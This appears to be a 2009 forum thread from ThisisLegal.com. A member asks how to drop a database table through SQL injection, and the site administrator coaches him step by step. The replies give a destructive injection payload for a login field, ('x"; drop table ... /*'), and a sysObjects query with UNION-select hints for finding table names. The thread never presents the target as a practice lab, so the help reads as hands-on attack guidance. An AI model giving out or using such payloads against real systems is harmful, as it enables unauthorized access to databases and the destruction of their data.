ThisisLegal.com

ThisisLegal Forums

Welcome to the forums! A chance for site members to chat and get help.

You are not logged in.

#1 2009-09-26 18:12:02

Timse
Member
Registered: 2009-02-08
Posts: 18

SQL Drop table

I am wanting to drop a table but i am not so good at SQL injection.
Is UserID and Pwd the tables?
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'UserID = ''X' '1'='2' And Pwd = ''X' '1'='2''.

Offline

#2 2009-09-27 03:26:10

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: SQL Drop table

no, it appears UserID and Pwd are the user and password columns for the table. First you need to find out the table name then try:

x"; drop table [TABLE NAME HERE] /*

in the username box and leave the password box blank


Site admin

Offline

#3 2009-09-27 03:52:36

Timse
Member
Registered: 2009-02-08
Posts: 18

Re: SQL Drop table

How can i find the table name???

Offline

#4 2009-09-27 07:09:20

t0mmy9
Administrator
Registered: 2005-01-07
Posts: 21

Re: SQL Drop table

There is no definite answer to this. It is mostly down to guessing obvious names (members, users, login ...etc)

I know nothing about M$ ODBC, but from research it appears to use M$SQL, so you could get the table name from some trial and error with SysObjects that is built in.

This is starting to get pretty advanced though, you need to do a union select and find out the number of columns in the table. Look at tutorials #3 and #18 on this site for more, but here is the injection (without the first part, union or null columns) you will need to figure some out yourself

(Look for a (U)ser table starting with 'user')

SELECT name FROM sysObjects WHERE type = 'U' AND name LIKE 'user%'

Site admin

Offline

Board footer

Powered by FluxBB